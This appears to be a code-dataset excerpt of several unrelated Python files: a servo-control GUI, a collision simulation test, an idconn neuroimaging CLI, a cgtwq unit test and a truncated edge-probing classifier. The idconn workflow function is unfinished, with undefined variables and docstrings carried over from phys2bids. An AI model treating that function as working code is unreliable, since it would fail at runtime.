deleteall(self):\n        conn = sqlite3.connect('position.dms')\n        cursor = conn.cursor()\n\n        # cursor.execute('drop table `time`')\n        # cursor.execute('drop table `speed`')\n        # cursor.execute('drop table `servo_1`')\n        # cursor.execute('drop table `servo_2`')\n        # cursor.execute('drop table `servo_3`')\n        # cursor.execute('drop table `servo_4`')\n        # cursor.execute('drop table `servo_5`')\n        # cursor.execute('drop table `servo_6`')\n        # cursor.execute('drop table `servo_7`')\n        # cursor.execute('drop table `servo_8`')\n        # cursor.execute('drop table `servo_9`')\n        cursor.execute('DELETE FROM servo_1 ')\n        cursor.execute('DELETE FROM servo_2 ')\n        cursor.execute('DELETE FROM servo_3 ')\n        cursor.execute('DELETE FROM servo_4 ')\n        cursor.execute('DELETE FROM servo_5 ')\n        cursor.execute('DELETE FROM servo_6 ')\n        cursor.execute('DELETE FROM servo_7 ')\n        cursor.execute('DELETE FROM servo_8 ')\n        cursor.execute('DELETE FROM servo_9 ')\n        cursor.execute('DELETE FROM speed ')\n        cursor.execute('DELETE FROM time ')\n        conn.commit()\n\n\n\n    def some_play(self):\n        t1 = threading.Thread(target=compiling)\n        t1.start()\n\n\n    # window for creating new databases (described in db_input)\n    def new_data(self):\n        self.newWindow = tk.Toplevel(self.master)\n        self.app = new_base(self.newWindow)", "sub_path": "main_window.py", "file_name": "main_window.py", "file_ext": "py", "file_size_in_byte": 14882, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tkinter.Frame", "line_number": 17, "usage_type": "call"}, {"api_name": "tkinter.ttk.Label", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 50, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 52, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 52, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 55, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 57, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 57, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 60, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 60, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 62, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 65, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", 
"line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 67, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 70, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 70, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 72, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 75, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 75, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 77, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 80, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 82, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 85, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 85, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 87, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 87, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 90, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 90, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 92, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 95, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 95, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 97, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 97, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 102, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 102, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 103, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scale", "line_number": 104, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 104, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 107, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 107, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 112, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 112, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 114, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 114, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scale", "line_number": 117, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 117, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 120, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 120, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 125, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 125, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 126, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 126, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 129, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 129, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", 
"line_number": 148, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 174, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 232, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 234, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 242, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 316, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 342, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 372, "usage_type": "call"}, {"api_name": "sketchbooks.SW.run_servo.compiling", "line_number": 372, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 378, "usage_type": "call"}]}
+{"seq_id": "89533733", "text": "# test1.py\n\nimport sys\nsys.path.insert(0, '../')\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle\nimport random\n\nimport disk.disk as disk\nimport event.event as ev\nimport system.system as sy\n\n# import matplotlib.animation as anim\n\ndisk.VX = 0.5\ndisk.VY = 0.5\n\nNoPart = 10\ncolors = ['red', 'blue', 'green', 'yellow', 'pink', 'magenta', 'cyan', 'orange', 'purple']\n\nwind = False\nSystem = sy.System(window = wind)\nfor i in range(NoPart):\n System.particles.append(disk.Disk(vx = disk.VX, vy = disk.VY, rad = 2, col = random.choice(colors), tag = str(i)))\n\nSystem.set_random_positions()\n\n# check_overlap() # Revisar 2.4.1\nSystem.check_overlap()\n\ncont = 0\nfor j in System.particles:\n # print(j)\n cont += 1\n j.obj = Circle((j.x, j.y), j.rad, color = j.col)\n\n\n# Grafica del Momentum\nfig, ax = plt.subplots()\n\n\nsim_time = 200000\nPtot = System.main_loop(sim_time)\n\n# 2.4.1 Grafica del Momentum Lineal\n# print(Ptot)\n# print(\"len =\", len(Ptot))\ntime = [i for i in range(0, len(Ptot))]\nax.plot(time, Ptot)\nax.grid()\nplt.show()\n\n\n\n\n################################################################################\n# ANIMACION with matplotlib.animation\n# fig2, ax2 = plt.subplots()\n# fig2.set_size_inches(20, 20)\n# fig2.patch.set_facecolor('xkcd:salmon')\n#\n# ax2.set_facecolor('xkcd:black')\n# ax2.set_aspect('equal')\n# ax2.set_xlim(0, 200)\n# ax2.set_ylim(0, 200)\n# ax2.set_title('Simulation Collition Particles')\n# plt.grid(True, color = 'w')\n#\n# ball, = plt.plot(x[0], y[0], 'ro')\n#\n# def animate(i):\n# ball.set_data(x[i], y[i])\n# return ball,\n#\n# myAnimation = anim.FuncAnimation(fig2, animate, frames = np.arange(0, len(x), 1), blit = True, repeat = True)\n#\n# plt.show()\n", "sub_path": "Collitions/tests/test1.py", "file_name": "test1.py", "file_ext": "py", "file_size_in_byte": 1718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "disk.disk.VX", "line_number": 17, "usage_type": "attribute"}, {"api_name": "disk.disk", "line_number": 17, "usage_type": "name"}, {"api_name": "disk.disk.VY", "line_number": 18, "usage_type": "attribute"}, {"api_name": "disk.disk", "line_number": 18, "usage_type": "name"}, {"api_name": "system.system.System", "line_number": 24, "usage_type": "call"}, {"api_name": "system.system", "line_number": 24, "usage_type": "name"}, {"api_name": "disk.disk.Disk", "line_number": 26, "usage_type": "call"}, {"api_name": "disk.disk", "line_number": 26, "usage_type": "name"}, {"api_name": "disk.disk.VX", "line_number": 26, "usage_type": "attribute"}, {"api_name": "disk.disk.VY", "line_number": 26, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.patches.Circle", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}]}
+{"seq_id": "628729484", "text": "#!/usr/bin/env python3\n\n\"\"\"\nPhys2bids is a python3 library meant to set physiological files in BIDS standard.\nIt was born for Acqknowledge files (BIOPAC), and at the moment it supports\n``.acq`` files and ``.txt`` files obtained by labchart (ADInstruments).\nIt requires python 3.6 or above, as well as the modules:\n- `numpy`\n- `matplotlib`\nIn order to process ``.acq`` files, it needs `bioread`, an excellent module\nthat can be found at `this link`_\nThe project is under development.\nAt the very moment, it assumes:\n- the input file is from one individual scan, not one session with multiple scans.\n.. _this link:\n https://github.com/uwmadison-chm/bioread\nCopyright 2019, The Phys2BIDS community.\nPlease scroll to bottom to read full license.\n\"\"\"\n\nimport datetime\nimport logging\nimport os\nimport sys\nimport argparse\nfrom copy import deepcopy\nfrom shutil import copy as cp\n\nimport numpy as np\n\nfrom idconn import io, _version\n\n# from idconn.cli.run import _get_parser\nfrom idconn.connectivity import build_networks\n\n# from idconn.networking import graph_measures\n# from idconn.data import\n# from idconn.statistics import\n\nfrom . import __version__\nfrom .due import due, Doi\n\nLGR = logging.getLogger(__name__)\nLGR.setLevel(logging.INFO)\n\n\ndef _get_parser():\n \"\"\"\n Parse command line inputs for this function.\n Returns\n -------\n parser.parse_args() : argparse dict\n Notes\n -----\n # Argument parser follow template provided by RalphyZ.\n # https://stackoverflow.com/a/43456577\n \"\"\"\n parser = argparse.ArgumentParser()\n optional = parser._action_groups.pop()\n required = parser.add_argument_group(\"Required Argument:\")\n required.add_argument(\n \"-dset\",\n \"--dataset\",\n dest=\"filename\",\n type=str,\n help=\"The path to the BIDS dataset containing fMRI \"\n \"data and fMRIPrep derivatives\",\n required=True,\n )\n optional.add_argument(\n \"-info\",\n \"--info\",\n dest=\"info\",\n action=\"store_true\",\n help=\"Only output info about the file, don't process. \"\n \"Default is to process.\",\n default=False,\n )\n optional.add_argument(\n \"-indir\",\n \"--input-dir\",\n dest=\"indir\",\n type=str,\n help=\"Folder containing input. \" \"Default is current folder.\",\n default=\".\",\n )\n optional.add_argument(\n \"-outdir\",\n \"--output-dir\",\n dest=\"outdir\",\n type=str,\n help=\"Folder where output should be placed. \"\n \"Default is current folder. \"\n 'If \"-heur\" is used, it\\'ll become '\n 'the site folder. Requires \"-sub\". '\n 'Optional to specify \"-ses\".',\n default=\".\",\n )\n optional.add_argument(\n \"-heur\",\n \"--heuristic\",\n dest=\"heur_file\",\n type=str,\n help=\"File containing heuristic, with or without \"\n \"extension. This file is needed in order to \"\n \"convert your input file to BIDS format! \"\n \"If no path is specified, it assumes the file is \"\n \"in the current folder. Edit the heur_ex.py file in \"\n \"heuristics folder.\",\n default=None,\n )\n optional.add_argument(\n \"-sub\",\n \"--subject\",\n dest=\"sub\",\n type=str,\n help='Specify alongside \"-heur\". Code of ' \"subject to process.\",\n default=None,\n )\n optional.add_argument(\n \"-ses\",\n \"--session\",\n dest=\"ses\",\n type=str,\n help='Specify alongside \"-heur\". Code of ' \"session to process.\",\n default=None,\n )\n optional.add_argument(\n \"-chtrig\",\n \"--channel-trigger\",\n dest=\"chtrig\",\n type=int,\n help=\"The column number of the trigger channel. 
\"\n \"Channel numbering starts with 1. \"\n \"Default is 0. If chtrig is left as zero phys2bids will \"\n \"perform an automatic trigger channel search by channel names.\",\n default=0,\n )\n optional.add_argument(\n \"-chsel\",\n \"--channel-selection\",\n dest=\"chsel\",\n nargs=\"*\",\n type=int,\n help=\"The column numbers of the channels to process. \"\n \"Default is to process all channels.\",\n default=None,\n )\n optional.add_argument(\n \"-ntp\",\n \"--numtps\",\n dest=\"num_timepoints_expected\",\n nargs=\"*\",\n type=int,\n help=\"Number of expected trigger timepoints (TRs). \"\n \"Default is None. Note: the estimation of beggining of \"\n \"neuroimaging acquisition cannot take place with this default. \"\n \"If you're running phys2bids on a multi-run recording, \"\n \"give a list of each expected ntp for each run.\",\n default=None,\n )\n optional.add_argument(\n \"-tr\",\n \"--tr\",\n dest=\"tr\",\n nargs=\"*\",\n type=float,\n help=\"TR of sequence in seconds. \"\n \"If you're running phys2bids on a multi-run recording, \"\n \"you can give a list of each expected ntp for each run, \"\n \"or just one TR if it is consistent throughout the session.\",\n default=None,\n )\n optional.add_argument(\n \"-thr\",\n \"--threshold\",\n dest=\"thr\",\n type=float,\n help=\"Threshold to use for trigger detection. \"\n 'If \"ntp\" and \"TR\" are specified, phys2bids '\n \"automatically computes a threshold to detect \"\n \"the triggers. Use this parameter to set it manually. \"\n \"This parameter is necessary for multi-run recordings. \",\n default=None,\n )\n optional.add_argument(\n \"-pad\",\n \"--padding\",\n dest=\"pad\",\n type=float,\n help=\"Padding in seconds used around a single run \"\n \"when separating multi-run session files. \"\n \"Default is 9 seconds.\",\n default=9,\n )\n optional.add_argument(\n \"-chnames\",\n \"--channel-names\",\n dest=\"ch_name\",\n nargs=\"*\",\n type=str,\n help=\"Column header (for json file output).\",\n default=[],\n )\n optional.add_argument(\n \"-yml\",\n \"--participant-yml\",\n dest=\"yml\",\n type=str,\n help=\"full path to file with info needed to generate \" \"participant.tsv file \",\n default=\"\",\n )\n optional.add_argument(\n \"-debug\",\n \"--debug\",\n dest=\"debug\",\n action=\"store_true\",\n help=\"Only print debugging info to log file. Default is False.\",\n default=False,\n )\n optional.add_argument(\n \"-quiet\",\n \"--quiet\",\n dest=\"quiet\",\n action=\"store_true\",\n help=\"Only print warnings to log file. 
Default is False.\",\n default=False,\n )\n optional.add_argument(\n \"-v\", \"--version\", action=\"version\", version=(\"%(prog)s \" + __version__)\n )\n\n parser._action_groups.append(optional)\n\n return parser\n\n\ndef print_summary(filename, ntp_expected, ntp_found, samp_freq, time_offset, outfile):\n \"\"\"\n Print a summary onscreen and in file with informations on the files.\n Parameters\n ----------\n dset: str\n Name of the input dataset of idconn.\n subjects: int\n Number of expected timepoints, as defined by user.\n ntp_found: int\n Number of timepoints found with the automatic process.\n samp_freq: float\n Frequency of sampling for the output file.\n time_offset: float\n Difference between beginning of file and first TR.\n outfile: str or path\n Fullpath to output file.\n Notes\n -----\n Outcome:\n summary: str\n Prints the summary on screen\n outfile: .log file\n File containing summary\n \"\"\"\n start_time = -time_offset\n summary = (\n f\"\\n------------------------------------------------\\n\"\n f\"Filename: {filename}\\n\"\n f\"\\n\"\n f\"Timepoints expected: {ntp_expected}\\n\"\n f\"Timepoints found: {ntp_found}\\n\"\n f\"Sampling Frequency: {samp_freq} Hz\\n\"\n f\"Sampling started at: {start_time:.4f} s\\n\"\n f\"Tip: Time 0 is the time of first trigger\\n\"\n f\"------------------------------------------------\\n\"\n )\n LGR.info(summary)\n utils.write_file(outfile, \".log\", summary)\n\n\n@due.dcite(\n Doi(\"10.1038/sdata.2016.44\"),\n path=\"phys2bids\",\n description=\"The BIDS specification\",\n cite_module=True,\n)\ndef idconn(\n filename,\n info=False,\n indir=\".\",\n outdir=\".\",\n heur_file=None,\n sub=None,\n ses=None,\n chtrig=0,\n chsel=None,\n num_timepoints_expected=None,\n tr=None,\n thr=None,\n pad=9,\n ch_name=[],\n yml=\"\",\n debug=False,\n quiet=False,\n):\n \"\"\"\n Run main workflow of IDConn.\n Runs the parser, builds statsmodel json, then reads in fmri data + mask + task timing,\n makes and saves connectivity matrices, computes graph measures, and imputs missing data.\n If only info is required,\n it returns a summary onscreen.\n Otherwise, it operates on the input to return a .tsv.gz file, possibly\n in BIDS format.\n Raises\n ------\n NotImplementedError\n If the file extension is not supported yet.\n \"\"\"\n # Check options to make them internally coherent pt. 
I\n # #!# This can probably be done while parsing?\n outdir = os.path.abspath(outdir)\n os.makedirs(outdir, exist_ok=True)\n logdir = os.path.join(outdir, \"logs\")\n os.makedirs(logdir, exist_ok=True)\n\n # Create logfile name\n basename = \"idconn_\"\n extension = \"tsv\"\n isotime = datetime.datetime.now().strftime(\"%Y-%m-%dT%H%M%S\")\n logname = os.path.join(logdir, (basename + isotime + \".\" + extension))\n\n # Set logging format\n log_formatter = logging.Formatter(\n \"%(asctime)s\\t%(name)-12s\\t%(levelname)-8s\\t%(message)s\",\n datefmt=\"%Y-%m-%dT%H:%M:%S\",\n )\n\n # Set up logging file and open it for writing\n log_handler = logging.FileHandler(logname)\n log_handler.setFormatter(log_formatter)\n sh = logging.StreamHandler()\n\n if quiet:\n logging.basicConfig(\n level=logging.WARNING,\n handlers=[log_handler, sh],\n format=\"%(levelname)-10s %(message)s\",\n )\n elif debug:\n logging.basicConfig(\n level=logging.DEBUG,\n handlers=[log_handler, sh],\n format=\"%(levelname)-10s %(message)s\",\n )\n else:\n logging.basicConfig(\n level=logging.INFO,\n handlers=[log_handler, sh],\n format=\"%(levelname)-10s %(message)s\",\n )\n\n version_number = _version.get_versions()[\"version\"]\n LGR.info(f\"Currently running IDConn version {version_number}\")\n LGR.info(f\"BIDS dset derivatives live at {deriv_dir}\")\n\n # Save call.sh\n arg_str = \" \".join(sys.argv[1:])\n call_str = f\"idconn {arg_str}\"\n f = open(os.path.join(logdir, \"call.sh\"), \"a\")\n f.write(f\"#!bin/bash \\n{call_str}\")\n f.close()\n\n ###########\n # Need parser to include name and desc of model\n ###########\n statsmodels_path = os.path.join(outdir, \"model-{name}_desc-{desc}_smdl.json\")\n LGR.info(f\"Creating BIDS Stats Models json @ {statsmodels_path}\")\n model = io.build_statsmodel_json(\n name,\n task,\n contrast,\n confounds,\n highpass,\n mask,\n conn_meas,\n graph_meas,\n exclude=None,\n outfile=statsmodels_path,\n )\n\n # How do I get subjects from the model? Use pybids!\n\n ###########\n # Need parser to include space and task name\n ###########\n assert exists(\n dset_dir\n ), \"Specified dataset doesn't exist:\\n{dset_dir} not found.\\n\\nPlease check the filepath.\"\n layout = bids.BIDSLayout(dset_dir, derivatives=True)\n subjects = layout.get(return_type=\"id\", target=\"subject\", suffix=\"bold\")\n sessions = layout.get(return_type=\"id\", target=\"session\", suffix=\"bold\")\n runs = layout.get(return_type=\"id\", target=\"session\", suffix=\"bold\")\n preproc_subjects = layout2.get(\n scope=\"fmriprep\",\n return_type=\"id\",\n target=\"subject\",\n task=task,\n space=space,\n desc=\"preproc\",\n suffix=\"bold\",\n )\n if len(subjects) != len(preproc_subjects):\n LGR.info(\n f\"{len(subjects)} subjects found in dset, only {len(preproc_subjects)} have preprocessed BOLD data. 
Pipeline is continuing anyway, please double check preprocessed data if this doesn't seem right.\"\n        )\n\n    LGR.info(f\"Computing connectivity matrices using {atlas}\")\n    for subject in subjects:\n        LGR.info(f\"Subject {subject}\")\n        for session in sessions:\n            LGR.info(f\"Session {session}\")\n            adj_matrix = estimate_connectivity(\n                layout,\n                subject,\n                session,\n                runs,\n                connectivity_metric,\n                space,\n                atlas,\n                confounds,\n            )\n            # if graph_measures:\n            #    for measure in graph_measures:\n            #        estimate_thresh\n            # for threshold in bounds\n\n\ndef _main(argv=None):\n    options = _get_parser().parse_args(argv)\n    idconn(**vars(options))\n\n\nif __name__ == \"__main__\":\n    _main(sys.argv[1:])\n\n\"\"\"\nCopyright 2019, The Phys2BIDS community.\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\nhttp://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n", "sub_path": "idconn/idconn.py", "file_name": "idconn.py", "file_ext": "py", "file_size_in_byte": 13694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 44, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path", "line_number": 319, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 321, "usage_type": "call"}, {"api_name": "os.path", "line_number": 321, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 322, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 327, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 327, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 328, "usage_type": "call"}, {"api_name": "os.path", "line_number": 328, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 331, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 337, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 339, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 342, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 343, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 348, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 349, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 354, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 355, "usage_type": "attribute"}, {"api_name": "idconn._version.get_versions", "line_number": 360, "usage_type": "call"}, {"api_name": "idconn._version", "line_number": 360, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 365, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 367, "usage_type": "call"}, {"api_name": "os.path", "line_number": 367, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 374, "usage_type": "call"}, {"api_name": "os.path", "line_number": 374, "usage_type": "attribute"}, {"api_name": "idconn.io.build_statsmodel_json", "line_number": 376, "usage_type": "call"}, {"api_name": "idconn.io", "line_number": 376, "usage_type": "name"}, {"api_name": "due.due.dcite", "line_number": 279, "usage_type": "call"}, {"api_name": "due.due", "line_number": 279, "usage_type": "name"}, {"api_name": "due.Doi", "line_number": 280, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 442, "usage_type": "attribute"}]}
+{"seq_id": "395049922", "text": "# -*- coding=UTF-8 -*-\n\"\"\"Test class `cgtwq.Entry`.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytest\n\nimport cgtwq\nfrom tests import util\n\n\n@pytest.fixture(name=\"entry\")\n@util.skip_if_not_logged_in\ndef _entry():\n return (\n cgtwq.Database(\"proj_sdktest\")\n .module(\"shot\")\n .filter(\n cgtwq.Field(\"shot.entity\") == \"SDKTEST_EP01_01_sc001\",\n cgtwq.Field(\"task.pipeline\") == \"合成\",\n )\n .to_entry()\n )\n\n\n@util.skip_if_not_logged_in\ndef test_entry_related(entry):\n assert isinstance(entry, cgtwq.Entry)\n result = entry.related()\n assert isinstance(result, cgtwq.Selection)\n assert len(result) > 1\n", "sub_path": "tests/test_entry.py", "file_name": "test_entry.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cgtwq.Database", "line_number": 16, "usage_type": "call"}, {"api_name": "cgtwq.Field", "line_number": 19, "usage_type": "call"}, {"api_name": "cgtwq.Field", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "tests.util.skip_if_not_logged_in", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tests.util", "line_number": 13, "usage_type": "name"}, {"api_name": "cgtwq.Entry", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cgtwq.Selection", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tests.util.skip_if_not_logged_in", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tests.util", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "354529405", "text": "# Implementation of edge probing module.\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom ..tasks.edge_probing import EdgeProbingTask\nfrom .import modules\n\nfrom allennlp.modules.span_extractors import \\\n EndpointSpanExtractor, SelfAttentiveSpanExtractor\n\nfrom typing import Dict, Iterable, List\n\n\nclass EdgeClassifierModule(nn.Module):\n ''' Build edge classifier components as a sub-module.\n\n Use same classifier code as build_single_sentence_module,\n except instead of whole-sentence pooling we'll use span1 and span2 indices\n to extract span representations, and use these as input to the classifier.\n\n This works in the current form, but with some provisos:\n - Only considers the explicit set of spans in inputs; does not consider\n all other spans as negatives. (So, this won't work for argument\n _identification_ yet.)\n\n TODO: consider alternate span-pooling operators: max or mean-pooling,\n or SegRNN.\n\n TODO: add span-expansion to negatives, one of the following modes:\n - all-spans (either span1 or span2), treating not-seen as negative\n - all-tokens (assuming span1 and span2 are length-1), e.g. for\n dependency parsing\n - batch-negative (pairwise among spans seen in batch, where not-seen\n are negative)\n '''\n\n def _make_span_extractor(self):\n if self.span_pooling == \"attn\":\n return SelfAttentiveSpanExtractor(self.proj_dim)\n else:\n return EndpointSpanExtractor(self.proj_dim,\n combination=self.span_pooling)\n\n def _make_cnn_layer(self, d_inp):\n \"\"\"Make a CNN layer as a projection of local context.\n\n CNN maps [batch_size, max_len, d_inp]\n to [batch_size, max_len, proj_dim] with no change in length.\n \"\"\"\n k = 1 + 2 * self.cnn_context\n padding = self.cnn_context\n return nn.Conv1d(d_inp, self.proj_dim, kernel_size=k,\n stride=1, padding=padding, dilation=1,\n groups=1, bias=True)\n\n def __init__(self, task, d_inp: int, task_params):\n super(EdgeClassifierModule, self).__init__()\n # Set config options needed for forward pass.\n self.loss_type = task_params['cls_loss_fn']\n self.span_pooling = task_params['cls_span_pooling']\n self.cnn_context = task_params['edgeprobe_cnn_context']\n self.is_symmetric = task.is_symmetric\n self.single_sided = task.single_sided\n\n self.proj_dim = task_params['d_hid']\n # Separate projection for span1, span2.\n # Convolution allows using local context outside the span, with\n # cnn_context = 0 behaving as a per-word linear layer.\n # Use these to reduce dimensionality in case we're enumerating a lot of\n # spans - we want to do this *before* extracting spans for greatest\n # efficiency.\n self.proj1 = self._make_cnn_layer(d_inp)\n if self.is_symmetric or self.single_sided:\n # Use None as dummy padding for readability,\n # so that we can index projs[1] and projs[2]\n self.projs = [None, self.proj1, self.proj1]\n else:\n # Separate params for span2\n self.proj2 = self._make_cnn_layer(d_inp)\n self.projs = [None, self.proj1, self.proj2]\n\n # Span extractor, shared for both span1 and span2.\n self.span_extractor1 = self._make_span_extractor()\n if self.is_symmetric or self.single_sided:\n self.span_extractors = [None, self.span_extractor1, self.span_extractor1]\n else:\n self.span_extractor2 = self._make_span_extractor()\n self.span_extractors = [None, self.span_extractor1, self.span_extractor2]\n\n # Classifier gets concatenated projections of span1, span2\n clf_input_dim = 
